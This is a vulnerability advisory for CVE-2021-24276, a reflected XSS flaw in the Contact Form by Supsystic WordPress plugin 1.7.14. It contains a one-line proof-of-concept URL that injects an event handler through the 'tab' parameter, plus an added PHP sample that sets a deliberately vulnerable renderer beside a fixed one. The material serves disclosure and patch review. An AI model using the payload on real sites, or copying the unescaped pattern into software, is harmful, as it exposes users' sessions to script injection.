WordPress Contact Form plugin version 1.7.14 suffers from a cross site scripting vulnerability.
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
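The following is an added example, not the plugin's own code, contrasting the unsanitised-attribute pattern the advisory describes with a hardened version (hypothetical helper names and tab list; esc_attr() is the WordPress escaping function for attribute context):

```php
<?php
// Added illustration, not code from the Contact Form by Supsystic plugin.
// Both helpers render an options-page tab link from the "tab" request parameter.

// Vulnerable pattern: the parameter is written straight into an HTML attribute.
// A value containing a double quote closes the class attribute, and whatever
// follows becomes new attributes on the element.
function render_tab_link_vulnerable(string $tab): string {
    return '<a class="nav-tab ' . $tab . '" href="?page=contact-form-supsystic&tab=' . $tab . '">' . $tab . '</a>';
}

// Hardened: (1) accept only known tab names, (2) escape for the attribute context.
const KNOWN_TABS = ['main', 'forms', 'settings'];  // hypothetical allowlist

function render_tab_link_fixed(string $tab): string {
    // Allowlist first: an unknown value falls back to the default tab.
    if (!in_array($tab, KNOWN_TABS, true)) {
        $tab = 'main';
    }
    // esc_attr() is the WordPress helper for attribute context; outside WordPress,
    // htmlspecialchars() with ENT_QUOTES is the equivalent. Escaping is kept even
    // after the allowlist check so the output is safe if the list is later extended.
    $attr = function_exists('esc_attr')
        ? esc_attr($tab)
        : htmlspecialchars($tab, ENT_QUOTES, 'UTF-8');
    return '<a class="nav-tab ' . $attr . '" href="?page=contact-form-supsystic&amp;tab=' . $attr . '">' . $attr . '</a>';
}

// Constructed input: the advisory's proof-of-concept value as PHP receives it
// after URL decoding ("+" becomes a space).
$poc = '" style=animation-name:rotation onanimationstart=alert(/XSS/)//';
$tab = isset($_GET['tab']) ? (string) $_GET['tab'] : $poc;

echo render_tab_link_vulnerable($tab), "\n";  // quote terminates the attribute
echo render_tab_link_fixed($tab), "\n";       // unknown value replaced by "main"
```

Running it from the command line (no $_GET) prints the broken-out markup first and the safe default link second, which is the before/after a reviewer would want to see when checking the 1.7.15 fix.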